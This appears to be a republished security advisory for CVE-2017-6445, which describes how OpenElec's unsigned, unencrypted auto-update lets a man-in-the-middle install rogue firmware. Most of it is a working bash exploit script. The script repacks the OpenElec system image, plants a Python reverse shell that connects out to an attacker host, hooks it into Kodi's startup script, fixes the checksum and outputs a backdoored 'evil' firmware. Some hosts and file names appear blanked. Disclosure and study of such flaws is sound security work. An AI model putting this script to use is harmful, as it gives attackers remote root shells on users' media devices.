OpenElec 6.0.3 / 7.0.1 Code Execution

Risk: High
Local: No
Remote: Yes
CWE: CWE-347

CVSS Base Score: 7.6/10
Impact Subscore: 10/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

During my research about update mechanisms of open-source software I discovered vulnerabilities in OpenElec. == [ OVERVIEW ] == System affected: OpenElec CVE: CVE-2017-6445 Vulnerable component: auto-update feature Software-Version: 6.0.3, 7.0.1 User-Interaction: Reboot required Impact: Remote Code Execution with root permission == [ PRODUCT DESCRIPTION ] == According to its website "Open Embedded Linux Entertainment Center (OpenELEC) is a small Linux based Just Enough Operating System (JeOS) built from scratch as a platform to turn your computer into a Kodi media center." == [ VULNERABILITY ] == Automatic updates are disabled by default. After enabling it, OpenElec connects to to find out if there is an update for a newer version. If there is a newer version, openelec will download it from<version>.tar(or any other url returned by The auto-update feature of OpenElec does neither use encrypted connections nor does it use signed updates. A Man-In-The-Middle could manipulate the update-packages to gain root-access remotely. In order to run the downloaded firmware, the OpenElec-system has to be rebooted. So at this point user-interaction is required. == [ EXPLOIT ] == The following code downloads an openelec-firmware, extracts it, places a reverse-shell into the kodi-startscript and finally generates a backdoored firmware: #!/bin/bash OPENELEC="OpenELEC-RPi2.arm-7.0.1" DOWNLOADURL="" TMP="/tmp" cd $TMP test -e ${OPENELEC}.tar || wget $DOWNLOADURL/${OPENELEC}.tar test -d $OPENELEC || tar xvf ${OPENELEC}.tar test -d $TMP/unpacked || mkdir $TMP/unpacked cd $TMP/unpacked test -d $TMP/unpacked/squashfs-root || unsquashfs $TMP/$OPENELEC/target/SYSTEM cat > $TMP/unpacked/squashfs-root/usr/bin/ << EOF #!/bin/bash while true do python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",5000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);' > /dev/null 2>&1 done EOF chmod 777 $TMP/unpacked/squashfs-root/usr/bin/ awk '/trap cleanup TERM/ { print; print "/usr/bin/ &"; next }1' $TMP/unpacked/squashfs-root/usr/lib/kodi/ > $TMP/unpacked/squashfs-root/usr/lib/kodi/ mv $TMP/unpacked/squashfs-root/usr/lib/kodi/ $TMP/unpacked/squashfs-root/usr/lib/kodi/ chmod 777 $TMP/unpacked/squashfs-root/usr/lib/kodi/ mksquashfs squashfs-root/ SYS -noappend -comp gzip mv SYS $TMP/$OPENELEC/target/SYSTEM cd $TMP/$OPENELEC md5sum target/SYSTEM > target/SYSTEM.md5 cd $TMP tar cvf $OPENELEC.evil.tar $OPENELEC test -d $TMP/unpacked && rm -fr $TMP/unpacked test -d $OPENELEC && rm -rf $OPENELEC == [ MITIGATION ] == Ensure that auto-update is disabled. == [ Timeline ] == * This bug was reported on December 03 2016. * Published as Zero-Day after no reply from OpenElec on March 04 2017 == [ CREDITS ] == CVE-2017-6445 was discovered by Wolfgang Hotwagner (

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024,


Back to Top